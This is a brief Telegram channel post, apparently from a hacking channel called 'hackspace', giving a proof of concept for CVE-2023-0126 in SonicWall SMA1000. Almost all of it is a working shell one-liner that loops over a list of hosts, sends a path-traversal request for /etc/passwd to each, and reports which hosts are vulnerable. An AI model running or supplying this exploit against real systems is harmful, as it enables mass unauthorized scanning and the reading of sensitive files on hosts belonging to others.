hackspace
165 subscribers
283 photos
82 videos
25 files
1.02K links
hackspace
Download Telegram
CVE-2023-0126
SonicWall SMA1000
File Read Bug
POC:
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done